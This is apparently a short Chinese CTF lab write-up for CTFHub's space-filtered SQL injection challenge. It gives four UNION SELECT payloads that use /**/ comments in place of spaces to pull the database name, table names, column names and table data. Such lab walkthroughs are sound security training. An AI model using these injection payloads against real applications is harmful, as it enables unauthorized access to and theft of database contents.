CTFHUB-SQL注入-过滤空格

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据


空格被过滤,使用 /**/ 绕过

查询数据库名

复制代码
-1/**/union/**/select/**/1,database()

查询数据库中的表

复制代码
-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

复制代码
-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

复制代码
-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg
相关推荐
一键生成网站1 天前
AI原型工具企业需求分析:私有化部署与安全协作选购指南
人工智能·安全·需求分析·
G.O.G.O.G1 天前
《LeetCode SQL 从入门到进阶(MySQL)》06(下)
数据库·sql·oracle
mounter6251 天前
从内存隔离到运行时防线:透视 Linux 内核安全强化的博弈与演进
linux·网络·安全·linux kernel·kernel
zandy10111 天前
多租户SaaS架构下的BI数据隔离与权限治理体系
数据库·架构·数据加密
多巴胺梦想家1 天前
NoSQL 数据库:不只是关系型
数据库·nosql
数字孪生家族1 天前
3DGS 数据编辑单体化技术:将高斯重建转化为结构化数字空间资产
数据库·3d·高斯泼溅·空间智能应用
广州灵眸科技有限公司1 天前
瑞芯微RV1126B开发板(EASY-EAI-PI2) 系统操作-线进程操作
数据库·单片机·嵌入式硬件·算法·php
chenyulin45451 天前
企业微信API二次开发:万级并发回调下的极致幂等性设计与防重放架构实战
大数据·人工智能·安全·架构·企业微信
云水一下1 天前
零基础玩转 bWAPP 靶场(五):HTML 注入——存储型(博客)
web安全·html·bwapp·存储型注入
石一峰6991 天前
驱动:私有数据为什么要在三个地方各挂一遍?
数据库·python·算法